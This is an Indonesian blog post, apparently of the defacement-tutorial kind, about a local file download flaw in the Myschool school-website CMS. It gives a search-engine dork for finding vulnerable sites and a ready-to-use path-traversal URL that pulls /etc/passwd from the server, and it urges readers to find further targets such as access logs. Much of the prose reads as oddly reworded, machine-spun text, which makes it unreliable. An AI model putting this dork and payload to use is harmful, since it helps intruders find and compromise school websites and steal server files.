Cara Deface Myschool CMS LFD Vulnerability | Info Links 385

/* No Script */ body,html{overflow:hidden} .noscript{background:#1277cb;color:#fff;padding:8% 0 0 0;position:fixed;bottom:0;left:0;top:0;right:0;z-index:1000;height:auto;-webkit-transform:translateZ(0);transform:translateZ(0);overflow:hidden} .noscript p{margin:0;text-align:center;padding:0 20px 10px 20px;margin:auto;font-size:3rem;line-height:1.5;font-family:monospace;max-width:970px;text-transform:uppercase;font-weight:700} .noscript p span{color:#ffe88b;font-size:10rem;line-height:normal;font-weight:normal}

Partner Privacy Policy Sitemap

Home » Unlabelled » Cara Deface Myschool CMS LFD Vulnerability

Selasa, 09 April 2019

Cara Deface Myschool CMS LFD Vulnerability

Published by : Mariadi Habibi

CMS Myschool adalah sebuah konten manajemen yang dibikin oleh anekaweb pakai php dan mysql, yang ditujukan untuk web – web sekolah. Walaupun tidak semua web sekolah menggunakannya dan tidak semua penggunanya adalah web sekolah. :v Selain memicu cms myschool, banyak cms lain yang telah dibikin oleh anekaweb. Tapi ga mutlak sih, disini kan kita hanya rela bahas lfd terhadap cms myschool. Nah, membuat yang blom tau lfd itu apa kalian sanggup baca artikel Local file download vulnerability.

Sebelum aku memicu write up disini, aku pernah mempublikasikan celah ini di cxsecurity kala aku tetap berada di Error Violence. Tapi apalah error violence, itu hanya aku greet karena team aja.

Dalam kerentanan LFD ini, yang aku contohkan adalah mengambi file /etc/passwd dari server pakai celah Local file download terhadap user. Nah, untuk pemanfaatan lain layaknya melacak konfigurasi access logs dan sebagainya silakan cari sendiri dirnya 😀

Dork: inurl:/img_anekaweb/
Exploit: /webconfig/download.php?file=../../../../../../../../../../etc/passwd

Baca selengkapnya di Myschool CMS LFD Vulnerability.

Load comments

Langganan: Posting Komentar ( Atom )